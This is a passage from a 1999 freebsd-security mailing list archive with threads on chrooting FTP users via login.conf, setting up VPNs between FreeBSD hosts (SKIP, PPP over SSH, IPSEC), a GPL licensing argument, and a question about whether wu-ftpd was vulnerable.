   hopefully now you have an ftpd with the 'ls' command built-in

3. include the following entry into your desired login class in /etc/login.conf:
     :ftp-chroot:

4. cap_mkdb /etc/login.conf

now everyone with that login class will be chrooted into their home directory when they ftp into your machine.

hope this helps

-j

erik writes:
 >
 > is there a way to deny a registered user access to anything but his own
 > homedirectory?
 >
 > it would be nice if it was the same as with anonymous access.. i.e. users
 > who cwd to "/" ,
 > really enters the virtual ftp root instead of the real system root.
 >
 > is this possible to do with _non-anonymous_ users?
 >
 > for example:
 >
 > in a normal setup, when user foo ftps to the system, the initial directory
 > will be
 > his homedirectory. when (for some reason) he cwd to "/" he will enter the
 > real system root.
 > can you limit him to only access his own stuff, i.e. a cwd to / will bring
 > him to /home/fred.
 >
 > any suggestions appreciated!
> > /erik > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 3:30:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id 09F7514BDC for ; Sun, 25 Apr 1999 03:30:01 -0700 (PDT) (envelope-from theo@tepucom.nl) Received: from theo.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id MAA17830 for ; Sun, 25 Apr 1999 12:29:04 +0200 (CETDST) Received: by theo.tepucom.nl with Microsoft Mail id <01BE8F18.6DF1C1E0@theo.tepucom.nl>; Sun, 25 Apr 1999 12:37:49 +-200 Message-ID: <01BE8F18.6DF1C1E0@theo.tepucom.nl> From: Theo Purmer To: "'freebsd-security@freebsd.org'" Subject: VPN Date: Sun, 25 Apr 1999 12:37:48 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anybody know if its possible to make a vpn (tunnel) with two freebsd hosts? 
I can't find anything about tunneling or vpn in the manual pages

Thanks

Theo Purmer
Tepucom
The Netherlands

From owner-freebsd-security Sun Apr 25 4:38:13 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zeus.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id D8F5114D03 for ; Sun, 25 Apr 1999 04:38:08 -0700 (PDT) (envelope-from akm@zeus.theinternet.com.au)
Received: (from akm@localhost) by zeus.theinternet.com.au (8.9.3/8.8.7) id VAA54390; Sun, 25 Apr 1999 21:36:43 +1000 (EST) (envelope-from akm)
From: Andrew Kenneth Milton
Message-Id: <199904251136.VAA54390@zeus.theinternet.com.au>
Subject: Re: VPN
In-Reply-To: <01BE8F18.6DF1C1E0@theo.tepucom.nl> from Theo Purmer at "Apr 25, 1999 12:37:48 pm"
To: theo@tepucom.nl (Theo Purmer)
Date: Sun, 25 Apr 1999 21:36:43 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

+----[ Theo Purmer ]---------------------------------------------
| Does anybody know if it's possible
| to make a vpn (tunnel) with two freebsd
| hosts?
|
| I can't find anything about tunneling or
| vpn in the manual pages

Use the skip port.

You can setup an encrypted tunnel between two hosts.
--
Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew
The Internet (Aust) Pty Ltd          | F:+61 7 3870 4477 | Milton
ACN: 082 081 472                     | M:+61 416 022 411 |72 Col .Sig
PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|Specialist

From owner-freebsd-security Sun Apr 25 4:48:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 5C49214D03 for ; Sun, 25 Apr 1999 04:48:52 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id VAA03984; Sun, 25 Apr 1999 21:18:51 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA06174; Sun, 25 Apr 1999 21:19:20 +0930
Date: Sun, 25 Apr 1999 21:19:19 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Theo Purmer
Cc: "'freebsd-security@freebsd.org'"
Subject: Re: VPN
In-Reply-To: <01BE8F18.6DF1C1E0@theo.tepucom.nl>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 25 Apr 1999, Theo Purmer wrote:

> Does anybody know if it's possible
> to make a vpn (tunnel) with two freebsd
> hosts?

Absolutely - a system of PPP tunneled over SSH works well for me (the SSH provides the encryption layer and PPP handles the networking). If you're going between two freebsd hosts then you're probably best off using the user-mode ppp driver (man 8 ppp) which is generally "better" than the alternative pppd.

I haven't done this with ppp(8), but probably the way to go is to use the PPP-over-TCP function and connect to localhost:someport on both ends, and set up SSH to provide an encrypted tunnel via the -Lsomeport:remotehost:someport option.

If you're wanting to communicate with a non-FreeBSD UNIX box then your best bet is probably PPPD (kernel-mode ppp) - I haven't figured out how to make ppp(8) inter-operate with pppd(8) when used as a tunnel (if anyone knows how to make this work it would be helpful). Actually the version of PPPD in the base tree doesn't support this as easily as the latest version (v2.3.7) - your best bet would be to compile it separately (which is simple). Using pppd I just do something like:

    pppd pty "ssh -t remote.host.com pppd"

and then set up the network routes to route the desired IP addresses over the tunnel.

These are both good "poor man's" solutions - a technically superior solution (less overhead from all the layering and encapsulations) is IPSEC - look into the KAME stuff if you're interested (www.kame.net).

Kris

-----
The Feynman problem-solving algorithm:
1. Write down the problem
2. Think real hard
3.
Write down the solution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 6:41:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com (zogbe.tasam.com [198.232.144.254]) by hub.freebsd.org (Postfix) with ESMTP id 057B914D16 for ; Sun, 25 Apr 1999 06:41:26 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by zogbe.tasam.com (8.8.8/8.8.8) with SMTP id JAA09961; Sun, 25 Apr 1999 09:39:55 -0400 (EDT) (envelope-from freebsd.list@bug.tasam.com) Message-ID: <004901be8f21$327e3fe0$7271a1ce@tasam.com> From: "Joe Gleason" To: "Andrew Kenneth Milton" , "Theo Purmer" Cc: References: <199904251136.VAA54390@zeus.theinternet.com.au> Subject: Re: VPN Date: Sun, 25 Apr 1999 09:36:45 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What OSI layer does skip work on? Joe Gleason ----- Original Message ----- From: Andrew Kenneth Milton To: Theo Purmer Cc: Sent: Sunday, April 25, 1999 07:36 Subject: Re: VPN > +----[ Theo Purmer ]--------------------------------------------- > | Does anybody know if its possible > | to make a vpn (tunnel) with two freebsd > | hosts? > | > | I cant find anything about tunneling or > | vpn in the manual pages > > Use the skip port. > > You can setup an encrypted tunnel between two hosts. 
> > -- > Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew > The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton > ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 7: 1:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from shattered.disturbed.net (shattered.disturbed.net [192.139.81.180]) by hub.freebsd.org (Postfix) with ESMTP id 5FE2914D16 for ; Sun, 25 Apr 1999 07:01:50 -0700 (PDT) (envelope-from veers@disturbed.net) Received: from shattered.disturbed.net ([192.139.81.180]:46342 "EHLO shattered" ident: "IDENT-NONSENSE") by disturbed.net with ESMTP id <61521-49660>; Sun, 25 Apr 1999 10:06:19 -0400 Date: Sun, 25 Apr 1999 10:06:16 -0400 (EDT) From: Alex Perel To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <4.2.0.32.19990424191010.04521e00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 24 Apr 1999, Brett Glass wrote: > Don't use ProFTPd; it's GPLed. The BSD ftpd is capable of chrooting users > if you put their names in /etc/ftpchroot; see the man page. Brett, Give it a rest, eh? People are tired of your dogma, PARTICULARLY in a security-oriented mailing list. I've yet to use a license as a decision-making factor in the software I use, and I'm sure I'm not alone. If you don't want do use GPL'd software, don't. Your zealotry is not wanted here. Get it? (and don't bother replying to this either) Alex G. 
Perel -=- AP5081 alexp@iplink.net -=- (work) veers@disturbed.net -=- (play) Disturbed Networks - Powered exclusively by FreeBSD == The Power to Serve -=- http://www.freebsd.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 7:33:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from zeus.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 48422150EA for ; Sun, 25 Apr 1999 07:33:49 -0700 (PDT) (envelope-from akm@zeus.theinternet.com.au) Received: (from akm@localhost) by zeus.theinternet.com.au (8.9.3/8.8.7) id AAA60561; Mon, 26 Apr 1999 00:32:07 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199904251432.AAA60561@zeus.theinternet.com.au> Subject: Re: VPN In-Reply-To: <004901be8f21$327e3fe0$7271a1ce@tasam.com> from Joe Gleason at "Apr 25, 1999 9:36:45 am" To: freebsd.list@bug.tasam.com (Joe Gleason) Date: Mon, 26 Apr 1999 00:32:07 +1000 (EST) Cc: theo@tepucom.nl, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Joe Gleason ]--------------------------------------------- | What OSI layer does skip work on? This from the pkg/DESCR file for the skip port. This is from http://skip.incog.com: SKIP - Simple Key management for Internet Protocols IP-Level Cryptography Secure every application with one protocol SKIP secures the network at the IP packet level. Any networked application gains the benefits of encryption, without requiring modification. SKIP is unique in that an Internet host can send an encrypted packet to another host without requiring a prior message exchange to set up a secure channel. SKIP is particularly well-suited to IP networks, as both are stateless protocols. 
-- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 7:55:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com (zogbe.tasam.com [198.232.144.254]) by hub.freebsd.org (Postfix) with ESMTP id 22C431527B for ; Sun, 25 Apr 1999 07:55:35 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by zogbe.tasam.com (8.8.8/8.8.8) with SMTP id KAA10073; Sun, 25 Apr 1999 10:55:12 -0400 (EDT) (envelope-from freebsd.list@bug.tasam.com) Message-ID: <002301be8f2b$a88644d0$7271a1ce@tasam.com> From: "Joe Gleason" To: "Andrew Kenneth Milton" Cc: , References: <199904251432.AAA60561@zeus.theinternet.com.au> Subject: Re: VPN Date: Sun, 25 Apr 1999 10:55:15 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So I take that to mean layer 6, where it should be. Sounds cool, I will probably spend a good part of the day playing with it. Joe Gleason Tasam > +----[ Joe Gleason ]--------------------------------------------- > | What OSI layer does skip work on? > > This from the pkg/DESCR file for the skip port. > > This is from http://skip.incog.com: > > SKIP - Simple Key management for Internet Protocols > > IP-Level Cryptography > Secure every application with one protocol > > SKIP secures the network at the IP packet level. 
Any networked > application gains the benefits of encryption, without requiring > modification. SKIP is unique in that an Internet host can send an > encrypted packet to another host without requiring a prior message > exchange to set up a secure channel. SKIP is particularly well-suited > to IP networks, as both are stateless protocols. > > -- > Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew > The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton > ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8: 8: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 8183E15286 for ; Sun, 25 Apr 1999 08:08:03 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08924; Sun, 25 Apr 1999 09:07:59 -0600 (MDT) Message-Id: <4.2.0.32.19990425090254.0453a660@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sun, 25 Apr 1999 09:07:19 -0600 To: Alex Perel From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@FreeBSD.ORG In-Reply-To: References: <4.2.0.32.19990424191010.04521e00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:06 AM 4/25/99 -0400, Alex Perel wrote: >Give it a rest, eh? People are tired of your dogma, PARTICULARLY in a >security-oriented mailing list. What I am stating isn't dogma; it's verifiable fact. It is, rather, the GPL that cloaks itself in dogma. 
>I've yet to use a license as a >decision-making factor in the software I use, and I'm sure I'm not alone. This is unfortunate. The GPL and its promoters rely on this in order to maximize the GPL's negative impact on legitimate commercial developers. Rather than turning this into a long-winded discussion, I invite those who are interested in these issues to READ the GPL and also Stallman's own writings. "The GNU Manifesto," "Why Software Should Not Have Owners," and "Confusing Words You Might Wish to Avoid," all available at http://www.gnu.org, express Stallman's dogma and malicious intent very clearly. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8: 9:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 344E9152F2 for ; Sun, 25 Apr 1999 08:09:16 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08921; Sun, 25 Apr 1999 09:07:57 -0600 (MDT) Message-Id: <4.2.0.32.19990425090124.0453b8e0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sun, 25 Apr 1999 09:02:41 -0600 To: John Preisler , erik From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <14114.53550.598471.753465@habanero.chili-pepper.net> References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Note that if you don't have the full OS source on your system, you can bring in JUST the sources for ftpd and ls. 
This is what I frequently do when building ftpd. (Having an internal ls
really should be the default, IMHO.)

--Brett

At 03:32 AM 4/25/99 -0500, John Preisler wrote:
> I can't find the request I just got for this info, but in order to have
> this capability from login.conf(5) what you need to do is:
>
> 1. cd into src/libexec/ftpd
> 2. [assuming a Bourne shell]
>    $ export FTPD_INTERNAL_LS=true
>    $ make install clean
>
> hopefully now you have an ftpd with the 'ls' command built-in
>
> 3. include the following entry into your
>    desired login class in /etc/login.conf:
>    :ftp-chroot:
>
> 4. cap_mkdb /etc/login.conf
>
> now everyone with that login class will be chrooted into their home
> directory when they ftp into your machine.
>
> hope this helps
>
> -j
>
> erik writes:
> >
> > is there a way to deny a registered user access to anything but his own
> > homedirectory?
> >
> > it would be nice if it was the same as with anonymous access.. ie. users
> > who cwd to "/", really enters the virtual ftp root instead of the real
> > system root.
> >
> > is this possible to do with _none anonymous_ users?
> >
> > for example:
> >
> > in a normal setup, when user foo ftps to the system, the initial
> > directory will be his homedirectory. when (for some reason) he cwd to
> > "/" he will enter the real system root.
> > can you limit him to only access his own stuff, ie. a cwd to / will bring
> > him to /home/fred.
> >
> > any suggestions appreciated!
> >
> > /erik

From owner-freebsd-security Sun Apr 25 08:10:32 1999
From: Mark Murray
To: Brett Glass
Cc: Alex Perel, security@FreeBSD.ORG
Date: Sun, 25 Apr 1999 17:10:08 +0200
Subject: Re: limit ftp users to their homedir

Brett Glass wrote:
> At 10:06 AM 4/25/99 -0400, Alex Perel wrote:
>
> > Give it a rest, eh? People are tired of your dogma, PARTICULARLY in a
> > security-oriented mailing list.
>
> What I am stating isn't dogma; it's verifiable fact. It is, rather, the
> GPL that cloaks itself in dogma.

This has _ZERO_ to do with security. Please take it offline or to an
advocacy/chat list.

Thanks!
M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun Apr 25 08:15:36 1999
From: Brett Glass
To: Mark Murray
Cc: Alex Perel, security@FreeBSD.ORG
Date: Sun, 25 Apr 1999 09:14:24 -0600
Subject: Re: limit ftp users to their homedir

At 05:10 PM 4/25/99 +0200, Mark Murray wrote:
> This has _ZERO_ to do with security. Please take it offline or to
> an advocacy/chat list.

I have already recommended that people read the relevant information
rather than continuing the discussion in this forum. The issue is
important, however; to those of us who understand what the GPL is and
does, the presence or absence of the GPL is an important selection
criterion.
--Brett Glass

From owner-freebsd-security Sun Apr 25 08:19:53 1999
From: Christopher Petrilli
To: Brett Glass
Cc: security@freebsd.org
Date: Sun, 25 Apr 1999 11:20:36 -0400
Subject: Re: limit ftp users to their homedir

Religion has no place in security, please take it to BELIEF-L or
elsewhere. You only marginalize your legitimacy.
Chris
--
| Christopher Petrilli    ``Television is bubble-gum for
| petrilli@amber.org        the mind.'' -Frank Lloyd Wright

From owner-freebsd-security Sun Apr 25 08:31:00 1999
From: Brett Glass
To: Christopher Petrilli
Cc: security@freebsd.org
Date: Sun, 25 Apr 1999 09:30:13 -0600
Subject: Re: limit ftp users to their homedir

At 11:20 AM 4/25/99 -0400, Christopher Petrilli wrote:
> Religion has no place in security, please take it to BELIEF-L or
> elsewhere. You only marginalize your legitimacy.

Religion has no place in SOFTWARE. This is one of several reasons why the
presence of the GPL is an important reason for not using software. While
the presence or absence of the GPL does not affect the security of the
software per se, it can and should affect one's choice among solutions to
the security problem that had been posed (of which there are several).
If someone said, "Don't use that, it's Microsoft-proprietary," I'm sure
you wouldn't take it amiss, right? This is no different.

--Brett Glass

From owner-freebsd-security Mon Apr 26 05:00:50 1999
From: Terje Elde
To: Andrew Kenneth Milton
Cc: Theo Purmer, freebsd-security@FreeBSD.ORG
Date: Mon, 26 Apr 1999 14:00:43 +0200 (CEST)
Subject: Re: VPN

On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote:
> Use the skip port.

I've been told that skip supports only two 40 bit and two 56 bit (des and
rc-something being two of those) as well as SAFER, which has NSA written
all over it.

Can anyone comment on that?

Friendly greetings,
Terje Elde

  "One world, one web, one program" - Microsoft Promo ad.
  "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler

From owner-freebsd-security Mon Apr 26 05:36:22 1999
From: Fernando Schapachnik
To: erik@chapman.karlskrona.se (erik)
Cc: freebsd-security@FreeBSD.ORG
Date: Mon, 26 Apr 1999 09:36:10 -0300 (GMT)
Subject: Re: limit ftp users to their homedir

I use wu-ftpd for this and it works nicely. It also has some other
features.

There is an exploit for the current version -I think it keeps on being
the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't
recall the URL, but you can find it easily on the Web.

Regards and good luck.

In an earlier message, erik wrote:
>
> is there a way to deny a registered user access to anything but his own
> homedirectory?
>
> it would be nice if it was the same as with anonymous access.. ie. users
> who cwd to "/", really enters the virtual ftp root instead of the real
> system root.
>
> is this possible to do with _none anonymous_ users?
>
> for example:
>
> in a normal setup, when user foo ftps to the system, the initial
> directory will be his homedirectory.
> when (for some reason) he cwd to "/" he will enter the real system
> root. can you limit him to only access his own stuff, ie. a cwd to /
> will bring him to /home/fred.
>
> any suggestions appreciated!
>
> /erik

Fernando P. Schapachnik
Network administration
VIA Net Works Argentina SA

From owner-freebsd-security Mon Apr 26 05:46:00 1999
From: Jonas Eriksson
To: Fernando Schapachnik
Cc: erik, freebsd-security@FreeBSD.ORG
Date: Mon, 26 Apr 1999 14:45:30 +0200
Subject: Re: limit ftp users to their homedir

The url is: ftp://ftp.vr.net/pub/wu-ftpd/

Fernando Schapachnik wrote:
>
> I use wu-ftpd for this and it works nicely. It also has some other
> features.
>
> There is an exploit for the current version -I think it keeps on being
> the current- so you can get wu-ftpd-VR from another vendor. Sorry I
> don't recall the URL, but you can find it easily on the Web.
>
> Regards and good luck.
>
> In an earlier message, erik wrote:
> >
> > is there a way to deny a registered user access to anything but his own
> > homedirectory?
> >
> > it would be nice if it was the same as with anonymous access.. ie. users
> > who cwd to "/", really enters the virtual ftp root instead of the real
> > system root.
> >
> > is this possible to do with _none anonymous_ users?
> >
> > for example:
> >
> > in a normal setup, when user foo ftps to the system, the initial
> > directory will be his homedirectory. when (for some reason) he cwd to
> > "/" he will enter the real system root.
> > can you limit him to only access his own stuff, ie. a cwd to / will bring
> > him to /home/fred.
> >
> > any suggestions appreciated!
> >
> > /erik
>
> Fernando P. Schapachnik
> Network administration
> VIA Net Works Argentina SA

--
InterACT Luleå / Jonas Eriksson
Network & Security Administrator
Tel: +46 (0)920 88803 - Fax: +46 (0)920 88399
Current temp in Lulea/Sweden is 12.8C (55.0F)

From owner-freebsd-security Mon Apr 26 06:34:35 1999
From: "Jim Flowers"
To: "Terje Elde"
Date: Mon, 26 Apr 1999 09:33:58 -0400
Subject: Re: VPN

Depending on where you want to use it and (who you are) SKIP will work
(legally) with keys up to 2048 bits and will use DES-EDE-K3.

-----Original Message-----
From: Terje Elde
To: Andrew Kenneth Milton
Cc: Theo Purmer; freebsd-security@FreeBSD.ORG
Date: Monday, April 26, 1999 8:01 AM
Subject: Re: VPN

> On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote:
>
> > Use the skip port.
>
> I've been told that skip supports only two 40 bit and two 56 bit (des and
> rc-something being two of those) as well as SAFER, which has NSA written
> all over it.
>
> Can anyone comment on that?
>
> Friendly greetings,
> Terje Elde
>
>   "One world, one web, one program" - Microsoft Promo ad.
>   "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler

From owner-freebsd-security Mon Apr 26 08:29:08 1999
From: Igor Roshchin
To: freebsd-security@FreeBSD.ORG
Date: Mon, 26 Apr 1999 10:29:04 -0500 (CDT)
Subject: wu-ftpd: is there a vulnerability ? (was: Re: limit ftp users to their homedir)

Time to time somebody mentions that the current version of the wu-ftpd is
vulnerable (e.g. see below). Unless I missed something, there were no
postings about that on this (freebsd-security) mailing list.

Also, as it was explained earlier (sorry, I don't remember who it was,
probably Satoshi Asami ?) wu-ftpd on FreeBSD was not vulnerable to the
most recent (realpath function) vulnerability due to specifics of
FreeBSD's implementation of the realpath function.

So, I hope that either Warner Losh, or Satoshi Asami, or Andrey Chernov
can confirm the current state of the wu-ftpd port.

Also, it would be really helpful (I asked this earlier but it was not
noticed) to know what was the latest vulnerable version of wu-ftpd on
FreeBSD?

Regards,

Igor

----- Forwarded message from Fernando Schapachnik -----

I use wu-ftpd for this and it works nicely. It also has some other
features.

There is an exploit for the current version -I think it keeps on being
the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't
recall the URL, but you can find it easily on the Web.

<..>

----- End of forwarded message from Fernando Schapachnik -----

From owner-freebsd-security Mon Apr 26 08:41:17 1999
From: Fernando Schapachnik
To: igor@physics.uiuc.edu (Igor Roshchin)
Cc: freebsd-security@FreeBSD.ORG
Date: Mon, 26 Apr 1999 12:40:58 -0300 (GMT)
Subject: Re: wu-ftpd: is there a vulnerability ? (was: Re: limit ftp users to their homedir)

In an earlier message, Igor Roshchin wrote:
>
> Time to time somebody mentions that the current version of the wu-ftpd
> is vulnerable (e.g. see below).
[...]
> Also, as it was explained earlier (sorry, I don't remember who it was,
> probably Satoshi Asami ?) wu-ftpd on FreeBSD was not vulnerable
> to the most recent (realpath function) vulnerability due to
> specifics of FreeBSD's implementation of the realpath function.

Sorry, I didn't want to bring confusion. I maintain a network with various
Unices so I preferred to change to the VR version on the FreeBSD machines
also, just to have the same software in all the servers. I really did not
pay attention to the FreeBSD specific issue.

Regards.

Fernando P. Schapachnik
Network administration
VIA Net Works Argentina SA

From owner-freebsd-security Mon Apr 26 08:49:53 1999
From: James Wyatt
To: freebsd-security@FreeBSD.ORG
Date: Mon, 26 Apr 1999 10:15:49 -0500 (CDT)
Subject: Re: limit ftp users to their homedir

Regardless of my preference for the BSD license (though I tolerate the
GPL), I just flat trust the FreeBSD ftpd more than the rest and it does
everything I need from it - including multi-anon users and internal ls.

We had some AIX and Linux machines with that wuftpd hole. The fix was out
quickly and all, but having 1/3 of the OSs unaffected was nice. I am
considering porting FreeBSD's ftpd to the other two. I know wuftpd is a
great tool and is 'really fixed' now. I know the hole was tiny, but it was
bad and we had a host vulnerable in a bad spot. Bad fire alarm on an
e-commerce server.

If there is no reason to change the OTS binaries, I prefer not to. I
greatly appreciate the free software on the net and rapid source patches
to fix holes. This is why the AIX box had wuftpd rather than OTS AIX ftpd.
On Mon, 26 Apr 1999, Fernando Schapachnik wrote:
> I use wu-ftpd for this and it works nicely. It also has some other
> features.
>
> There is an exploit for the current version -I think it keeps on being
> the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't
> recall the URL, but you can find it easily on the Web.
> In an earlier message, erik wrote:
> >
> > is there a way to deny a registered user access to anything but his own
> > homedirectory?
> >
> > it would be nice if it was the same as with anonymous access.. ie. users
> > who cwd to "/", really enters the virtual ftp root instead of the real
> > system root.

From owner-freebsd-security Mon Apr 26 09:56:48 1999
From: Deepwell Internet
To: freebsd-security@FreeBSD.ORG
Date: Tue, 27 Apr 1999 09:55:25 -0700
Subject: Re: VPN

What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD
to interact with NT/95 machines running PPTP?

At 09:33 AM 4/26/99 -0400, you wrote:
> Depending on where you want to use it and (who you are) SKIP will work
> (legally) with keys up to 2048 bits and will use DES-EDE-K3.
> >-----Original Message----- >From: Terje Elde >To: Andrew Kenneth Milton >Cc: Theo Purmer ; freebsd-security@FreeBSD.ORG > >Date: Monday, April 26, 1999 8:01 AM >Subject: Re: VPN > > >>On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote: >> >>>Use the skip port. >> >>I've been told that skip supports only two 40 bit and two 56 bit (des and >>rc-something being two of those) as well as SAFER, which has NSA written >>all over it. >> >>Can anyone comment on that? >> >>Friendly greetings, >>Terje Elde >> >> "One world, one web, one program" - Microsoft Promo ad. >> "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler >> >> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 20: 0:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from enya.clari.net.au (enya.clari.net.au [203.8.14.116]) by hub.freebsd.org (Postfix) with ESMTP id 0CEDA14DE1 for ; Mon, 26 Apr 1999 20:00:31 -0700 (PDT) (envelope-from danny@enya.clari.net.au) Received: from localhost (danny@localhost) by enya.clari.net.au (8.9.2/8.8.7) with ESMTP 